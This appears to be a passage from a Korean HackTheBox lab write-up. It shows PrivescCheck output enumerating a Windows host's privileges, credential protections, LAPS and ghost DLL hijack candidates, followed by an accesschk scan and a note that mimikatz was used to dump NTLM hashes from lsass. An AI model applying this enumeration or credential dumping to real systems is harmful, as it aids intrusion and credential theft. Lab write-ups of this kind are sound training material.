TokenId : 00000000-0006a968
AuthenticationId : 00000000-00067aeb
OriginId : 00000000-000003e7
ModifiedId : 00000000-00067b22
Source : Advapi (00000000-00067ad6)
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance ?
? NAME ? User groups ?
????????????????????????????????????????????????????????????????
? Get information about the groups the current user belongs to ?
? (name, type, SID). ?
????????????????????????????????????????????????????????????????
[*] Status: Informational
Name Type SID
---- ---- ---
POV\\None Group S-1-5-21-2506154456-4081221362-271687478-513
Everyone WellKnownGroup S-1-1-0
BUILTIN\\Users Alias S-1-5-32-545
NT AUTHORITY\\BATCH WellKnownGroup S-1-5-3
CONSOLE LOGON WellKnownGroup S-1-2-1
NT AUTHORITY\\Authenticated Users WellKnownGroup S-1-5-11
NT AUTHORITY\\This Organization WellKnownGroup S-1-5-15
NT AUTHORITY\\Local account WellKnownGroup S-1-5-113
NT AUTHORITY\\LogonSessionId_0_424661 LogonSession S-1-5-5-0-424661
BUILTIN\\IIS_IUSRS Alias S-1-5-32-568
LOCAL WellKnownGroup S-1-2-0
IIS APPPOOL\\dev WellKnownGroup S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757
NT AUTHORITY\\NTLM Authentication WellKnownGroup S-1-5-64-10
Mandatory Label\\Medium Mandatory Level Label S-1-16-8192
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? User privileges ?
????????????????????????????????????????????????????????????????
? Check whether the current user has privileges (e.g., ?
? SeImpersonatePrivilege) that can be leveraged for privilege ?
? escalation to SYSTEM. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
Name State Description Exploitable
---- ----- ----------- -----------
SeChangeNotifyPrivilege Enabled Bypass traverse checking False
SeIncreaseWorkingSetPrivilege Disabled Increase a process working set False
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access ?
? NAME ? User environment variables ?
????????????????????????????????????????????????????????????????
? Check whether any environment variables contain sensitive ?
? information such as credentials or secrets. Note that this ?
? check follows a keyword-based approach and thus might not be ?
? completely reliable. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (nothing found)
?????????????????3???????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? Non-default services ?
????????????????????????????????????????????????????????????????
? Get information about third-party services. It does so by ?
? parsing the target executable's metadata and checking ?
? whether the publisher is Microsoft. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational
Name : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath : C:\\Windows\\System32\\OpenSSH\\ssh-agent.exe
User : LocalSystem
StartMode : Disabled
Name : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath : "C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe"
User : LocalSystem
StartMode : Automatic
Name : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath : C:\\Windows\\system32\\vm3dservice.exe
User : LocalSystem
StartMode : Automatic
Name : VMTools
DisplayName : VMware Tools
ImagePath : "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe"
User : LocalSystem
StartMode : Automatic
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access ?
? NAME ? LSA Protection ?
????????????????????????????????????????????????????????????????
? Check whether LSA protection is enabled. Note that when LSA ?
? protection is enabled, 'lsass.exe' runs as a Protected ?
? Process Light (PPL) and thus can only be accessed by other ?
? protected processes with an equivalent or higher protection ?
? level. ?
????????????????????????????????????????????????????????????????
[*] Status: Vulnerable - Low
Key : HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
Value : RunAsPPL
Data : (null)
Description : LSA protection is not enabled.
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access ?
? NAME ? Credential Guard ?
????????????????????????????????????????????????????????????????
? Check whether Credential Guard is supported and enabled. ?
? Note that when Credential Guard is enabled, credentials are ?
? stored in an isolated process ('LsaIso.exe') that cannot be ?
? accessed, even if the kernel is compromised. ?
????????????????????????????????????????????????????????????????
[*] Status: Vulnerable - Low
SecurityServicesConfigured : 0
SecurityServicesRunning : 0
SecurityServicesDescription : Credential Guard is not configured. Credential Guard is not running.
LsaCfgFlagsPolicyKey : HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard
LsaCfgFlagsPolicyValue : LsaCfgFlags
LsaCfgFlagsPolicyData : (null)
LsaCfgFlagsKey : HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA
LsaCfgFlagsValue : LsaCfgFlags
LsaCfgFlagsData : (null)
LsaCfgFlagsDescription : Credential Guard is not configured.
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0008 - Lateral Movement ?
? NAME ? LAPS ?
????????????????????????????????????????????????????????????????
? Check whether LAPS is configured and enabled. Note that this ?
? applies to domain-joined machines only. ?
????????????????????????????????????????????????????????????????
[*] Status: Vulnerable - Medium
Policy : Enable local admin password management (LAPS legacy)
Key : HKLM\\Software\\Policies\\Microsoft Services\\AdmPwd
Default : 0
Value : (null)
Description : The local administrator password is not managed (default).
Policy : LAPS > Configure password backup directory
Key : HKLM\\Software\\Microsoft\\Policies\\LAPS
Default : 0
Value : (null)
Description : The local administrator password is not backed up (default).
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? PATH folder permissions ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on ?
? the system-wide PATH folders. If so, the system could be ?
? vulnerable to privilege escalation through ghost DLL ?
? hijacking. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? Known ghost DLLs ?
????????????????????????????????????????????????????????????????
? Get information about services that are known to be prone to ?
? ghost DLL hijacking. Note that their exploitation requires ?
? the current user to have write permissions on at least one ?
? system-wide PATH folder. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational
Name : cdpsgshims.dll
Description : Loaded by the Connected Devices Platform Service (CDPSvc) upon startup.
RunAs : NT AUTHORITY\\LocalService
RebootRequired : True
Link : <https://nafiez.github.io/security/eop/2019/11/05/windows-service-host-process-eop.html>
Name : WptsExtensions.dll
Description : Loaded by the Task Scheduler service (Schedule) upon startup.
RunAs : LocalSystem
RebootRequired : True
Link : <http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html>
Name : SprintCSP.dll
Description : Loaded by the Storage Service (StorSvc) when the RPC procedure 'SvcRebootToFlashingMode' is invoked.
RunAs : LocalSystem
RebootRequired : False
Link : <https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc>
Name : wlanapi.dll
Description : Loaded by the Network Connections service (NetMan) when listing network interfaces.
RunAs : LocalSystem
RebootRequired : False
Link : <https://itm4n.github.io/windows-server-netman-dll-hijacking/>
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? AlwaysInstallElevated ?
????????????????????????????????????????????????????????????????
? Check whether the 'AlwaysInstallElevated' policy is enabled ?
? system-wide and for the current user. If so, the current ?
? user may install a Windows Installer package with elevated ?
? (SYSTEM) privileges. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
LocalMachineKey : HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData : (null)
Description : AlwaysInstallElevated is not enabled in HKLM.
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0008 - Lateral Movement ?
? NAME ? WSUS configuration ?
????????????????????????????????????????????????????????????????
? Check whether WSUS uses the HTTPS protocol to retrieve ?
? updates from the on-premise update server. If WSUS uses the ?
? clear-text HTTP protocol, it is vulnerable to MitM attacks ?
? that may result in remote code execution as SYSTEM. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
Key : HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate
Value : WUServer
Data : (null)
Description : No WSUS server is configured (default).
Key : HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU
Value : UseWUServer
Data : (null)
Description : WSUS server not enabled (default).
Key : HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate
Value : SetProxyBehaviorForUpdateDetection
Data : (null)
Description : Proxy fallback not configured (default).
Key : HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate
Value : DisableWindowsUpdateAccess
Data : (null)
Description : Windows Update features are enabled (default).
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0008 - Lateral Movement ?
? NAME ? Hardened UNC paths ?
????????????????????????????????????????????????????????????????
? Check whether sensitive UNC paths are properly hardened. ?
? Note that non-hardened UNC paths used for retrieving group ?
? policies can be hijacked through an MitM attack to obtain ?
? remote code execution as SYSTEM. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? Point and Print configuration ?
????????????????????????????????????????????????????????????????
? Check whether the Print Spooler service is enabled and if ?
? the Point and Print configuration allows non-administrator ?
? users to install printer drivers. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
Description : The Print Spooler service is disabled.
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? Latest updates installed ?
????????????????????????????????????????????????????????????????
? Check whether a Windows security update was installed within ?
? the last 31 days. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable)
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? User sessions ?
????????????????????????????????????????????????????????????????
? Get information about the currently logged-on users. Note ?
? that it might be possible to capture or relay the ?
? NTLM/Kerberos authentication of these users (RemotePotato0, ?
? KrbRelay). ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (nothing found)
????????????????????????????????????????????????????????????????
? ~~~ PrivescCheck Summary ~~~ ?
????????????????????????????????????????????????????????????????
TA0003 - Persistence
- UEFI & Secure Boot ▒ Low
TA0004 - Privilege Escalation
- User privileges ▒ High
TA0006 - Credential Access
- LSA Protection ▒ Low
TA0008 - Lateral Movement
- LAPS ▒ Medium
PS C:\\tmp> .\\accesschk.exe -uwqs "Authenticated Users" c:\\*.*
.\\accesschk.exe -uwqs "Authenticated Users" c:\\*.*
Accesschk v6.14 - Reports effective permissions for securable objects
Copyright � 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
RW c:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive
RW c:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue
RW c:\\ProgramData\\Microsoft\\Windows\\WER\\Temp
RW c:\\Windows\\Tasks
W c:\\Windows\\System32\\Tasks
W c:\\Windows\\SysWOW64\\Tasks
mimikatz로 메모리에서 lsass 떠서 확인해보니, 이미 로그인한 사용자 sfitz, alaading 사용자의 NTLM 해쉬는 확인할 수 있었지만, administrator 사용자의 hash, 비밀번호는 없음
'Hacking > HackTheBox' 카테고리의 다른 글
| Jeeves (win) (1) | 2024.07.02 |
|---|---|
| Union (Linux) (1) | 2024.06.27 |
| solarlab (0) | 2024.05.29 |
| Giddy (0) | 2024.05.15 |
| escape(windows) (1) | 2024.04.16 |
